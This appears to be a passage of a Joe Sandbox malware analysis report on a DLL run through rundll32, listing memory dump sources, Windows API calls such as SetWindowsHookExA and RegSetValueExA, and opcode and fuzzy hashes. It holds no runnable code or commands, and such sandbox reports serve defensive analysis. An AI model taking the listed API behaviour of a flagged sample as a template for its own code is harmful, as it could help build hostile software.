                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$SizeTime_memset_wctomb_s
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 26245289-0
                                                                                                                                  • Opcode ID: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
                                                                                                                                  • Instruction ID: d07d59a7ff7176791715ff84f3171322556d45097dda904751fff30d64e08997
                                                                                                                                  • Opcode Fuzzy Hash: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
                                                                                                                                  • Instruction Fuzzy Hash: 32411B755046199FC724DFA8D981C9AB7F8FF093A07508A2EE5A6D3690E730F944CF50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                  • Opcode ID: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
                                                                                                                                  • Instruction ID: f22ebcd49f6c4bcf1cb84aabd9b6e0a9805a11e2c96a6edef58545e6592a584a
                                                                                                                                  • Opcode Fuzzy Hash: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
                                                                                                                                  • Instruction Fuzzy Hash: 05318F70500259FFDB15DF51C889EAE7BA9EF05790F10806AF90A8F251DA30EEC0DBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1003E191
                                                                                                                                  • __isleadbyte_l.LIBCMT ref: 1003E1C5
                                                                                                                                  • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E1F6
                                                                                                                                  • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E264
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3058430110-0
                                                                                                                                  • Opcode ID: a45d194493aaf76ac1cbb866e4ff6e90a1da533cdec724975968ec5ddac79853
                                                                                                                                  • Instruction ID: 9e7ca2975dce83e2c1685c00030f8d0177b945f551d5a1751bafc6038c684fbd
                                                                                                                                  • Opcode Fuzzy Hash: a45d194493aaf76ac1cbb866e4ff6e90a1da533cdec724975968ec5ddac79853
                                                                                                                                  • Instruction Fuzzy Hash: 23317C31A00296EFDB12CFA4CC849AA7BE9FF05352F168669E8608F1D1D330AD40DB51
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 10026510
                                                                                                                                    • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                  • GetDC.USER32(?), ref: 1002658E
                                                                                                                                  • IntersectRect.USER32(?,?,?), ref: 100265C8
                                                                                                                                  • CreateRectRgnIndirect.GDI32(?), ref: 100265D2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Rect$CreateException@8H_prolog3IndirectIntersectThrow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3511876931-0
                                                                                                                                  • Opcode ID: 7f6c9fa0e8688ea19043668f2c8dfda2f995fd9ab5cfcbe19950409bb8c584bc
                                                                                                                                  • Instruction ID: 5a52d3282697d26d7181906baa499751bc8b7848460d4ff7fbcd99527b494316
                                                                                                                                  • Opcode Fuzzy Hash: 7f6c9fa0e8688ea19043668f2c8dfda2f995fd9ab5cfcbe19950409bb8c584bc
                                                                                                                                  • Instruction Fuzzy Hash: 71315D71D0062ADFCF01CFA4C989ADEBBB5FF08300F614459F915AB155D774AA81CBA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __msize_malloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1288803200-0
                                                                                                                                  • Opcode ID: 172559e824c18d3cfeedd4486189817d6fbc1f914f9a457cc390fc68d8836e76
                                                                                                                                  • Instruction ID: b47b26af396fa43851c5e16859074de777cbaf7baa699ca6a99f78ce61545289
                                                                                                                                  • Opcode Fuzzy Hash: 172559e824c18d3cfeedd4486189817d6fbc1f914f9a457cc390fc68d8836e76
                                                                                                                                  • Instruction Fuzzy Hash: 0921C138100210DFCB59DF64F881AEE77D5EF20690B908629F858CA246DB34ECA4CB80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 1002EB3E
                                                                                                                                  • PeekMessageA.USER32(00000001,00000000,00000200,00000209,00000003), ref: 1002EB98
                                                                                                                                  • PeekMessageA.USER32(00000001,00000000,00000100,00000109,00000003), ref: 1002EBAF
                                                                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000002), ref: 1002EBE9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessagePeek$H_prolog3
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3998274959-0
                                                                                                                                  • Opcode ID: 2a490924581eee8776ba6e67445ffafdb54cb4693ed265a3166e0c844ddbb0bc
                                                                                                                                  • Instruction ID: 2a88a428d7565fcf36a03eeacbe685c714d47f328614f3543ed6f1450f80f22a
                                                                                                                                  • Opcode Fuzzy Hash: 2a490924581eee8776ba6e67445ffafdb54cb4693ed265a3166e0c844ddbb0bc
                                                                                                                                  • Instruction Fuzzy Hash: BE317871A4039AAFDB21DFA4ED85EAE73E8FF04350F51091AB652AA1C1D770AE40CB10
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3_catch.LIBCMT ref: 100160AF
                                                                                                                                    • Part of subcall function 10015F7F: GetCurrentThreadId.KERNEL32 ref: 10015F92
                                                                                                                                    • Part of subcall function 10015F7F: SetWindowsHookExA.USER32(000000FF,Function_00015DEB,00000000,00000000), ref: 10015FA2
                                                                                                                                  • SetEvent.KERNEL32(?,00000060), ref: 1001615C
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10016165
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 1001616C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCurrentEventH_prolog3_catchHandleHookObjectSingleThreadWaitWindows
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1532457625-0
                                                                                                                                  • Opcode ID: aba3a14f37cb35c8a4256fe786ec03d8f5582434084a49b38ed0d3b5c255888d
                                                                                                                                  • Instruction ID: 49adf720413ee406403ea303cbd260c8a37cc91a4464af3b062c384fe739287e
                                                                                                                                  • Opcode Fuzzy Hash: aba3a14f37cb35c8a4256fe786ec03d8f5582434084a49b38ed0d3b5c255888d
                                                                                                                                  • Instruction Fuzzy Hash: 9B312A38A00646EFCB14EFA4CE9595DBBB0FF08311B15466CE5569F2A2DB30FA81CB51
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • CharNextA.USER32(?), ref: 10022C6D
                                                                                                                                    • Part of subcall function 10033A93: __ismbcspace_l.LIBCMT ref: 10033A99
                                                                                                                                  • CharNextA.USER32(00000000), ref: 10022C8A
                                                                                                                                  • _strtol.LIBCMT ref: 10022CB5
                                                                                                                                  • _strtoul.LIBCMT ref: 10022CBC
                                                                                                                                    • Part of subcall function 100338D4: strtoxl.LIBCMT ref: 100338F4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4211061542-0
                                                                                                                                  • Opcode ID: c0131c4ce0529d7fd5e33596a62ab6746ae30cca9c8134ef8296b597ce6c539f
                                                                                                                                  • Instruction ID: 5151050668a075cb653ef24e642dff21439099837a3a94c33d4a4bfb9d6c905b
                                                                                                                                  • Opcode Fuzzy Hash: c0131c4ce0529d7fd5e33596a62ab6746ae30cca9c8134ef8296b597ce6c539f
                                                                                                                                  • Instruction Fuzzy Hash: 352127755002556FDB21DFB49C81BAEB7F8DF48241FA14066F984D7240DB709D40CBA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ArrayDestroyFreeSafeTask
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3253174383-0
                                                                                                                                  • Opcode ID: 3972c6b8702509201bc2289ccb81f4c02271859ab5e073d977715a4d6fe1d911
                                                                                                                                  • Instruction ID: 529fdc980b661751dfd2f1e67b0f163afa7902daf74f578c55dc250feead27ea
                                                                                                                                  • Opcode Fuzzy Hash: 3972c6b8702509201bc2289ccb81f4c02271859ab5e073d977715a4d6fe1d911
                                                                                                                                  • Instruction Fuzzy Hash: 71117930201206EBDF66DF65EC88B6A7BE8FF05796B914458FC99CB250DB31ED01CA64
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Rect$EqualH_prolog3Intersect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2161412305-0
                                                                                                                                  • Opcode ID: f39b3bfbb9b8fe3bd79ee9f08207123a737bade4225fe621e8dcddae7340d759
                                                                                                                                  • Instruction ID: ff5c973b4bb1c2d03ca17daa0168de659ad61ff9b2eaf64daf92020a6b0172b0
                                                                                                                                  • Opcode Fuzzy Hash: f39b3bfbb9b8fe3bd79ee9f08207123a737bade4225fe621e8dcddae7340d759
                                                                                                                                  • Instruction Fuzzy Hash: D621367590024AEFCB01DFA4DD849EEBBB8FF08240F50856AF915A7111DB34AA05DB61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 1001FCF4
                                                                                                                                    • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 1001FD2A
                                                                                                                                  • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000800,8007000E,00000000,00000000,00000000,?,8007000E,1004F158,00000004,10013BBC,8007000E), ref: 1001FD53
                                                                                                                                    • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                                  • LocalFree.KERNEL32(8007000E,8007000E), ref: 1001FD7C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1615547351-0
                                                                                                                                  • Opcode ID: 7e5ced4c9e2eb0c702982f1f92c1bbdd58b98f1cb347c47c5882039fca099ce7
                                                                                                                                  • Instruction ID: 02293aacd12bdd5b71dc2e1620005b8d21a8bb506af1f41bdeabb16afe14deca
                                                                                                                                  • Opcode Fuzzy Hash: 7e5ced4c9e2eb0c702982f1f92c1bbdd58b98f1cb347c47c5882039fca099ce7
                                                                                                                                  • Instruction Fuzzy Hash: C0118675504249FFDB05DFA4DC819BE3BA9FB08350F118929F915CE2A1E631DA50C754
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • FindResourceA.KERNEL32 ref: 100170A7
                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 100170AF
                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 100170C1
                                                                                                                                  • FreeResource.KERNEL32(00000000), ref: 1001710B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Resource$FindFreeLoadLock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1078018258-0
                                                                                                                                  • Opcode ID: 11e397817ce9c23df1d0d820314bfc405a5ae10b9211d558aa096ea116c59da1
                                                                                                                                  • Instruction ID: b090516e65dfb2cc0079b63036416f790ce173b21e3ea297a20d0f4a61f138d4
                                                                                                                                  • Opcode Fuzzy Hash: 11e397817ce9c23df1d0d820314bfc405a5ae10b9211d558aa096ea116c59da1
                                                                                                                                  • Instruction Fuzzy Hash: 0A11DA34600B61FBC711DF68CD88AAAB3B4FB08295F118119E8468B550E3B0ED80D6A0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 1001512A
                                                                                                                                    • Part of subcall function 10015D26: __EH_prolog3.LIBCMT ref: 10015D2D
                                                                                                                                  • __strdup.LIBCMT ref: 1001514C
                                                                                                                                  • GetCurrentThread.KERNEL32(00000004,10001031,00000000), ref: 10015179
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 10015182
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4206445780-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10017742
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 1001774B
                                                                                                                                  • _swprintf.LIBCMT ref: 10017768
                                                                                                                                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10017779
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClosePrivateProfileStringValueWrite_swprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4210924919-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • FindResourceA.KERNEL32 ref: 10017C70
                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 10017C7C
                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 10017C8A
                                                                                                                                  • FreeResource.KERNEL32(00000000), ref: 10017CB8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Resource$FindFreeLoadLock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1078018258-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3354205298-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 10021648
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000), ref: 1002164E
                                                                                                                                  • DuplicateHandle.KERNEL32 ref: 10021651
                                                                                                                                  • GetLastError.KERNEL32(?), ref: 1002166C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
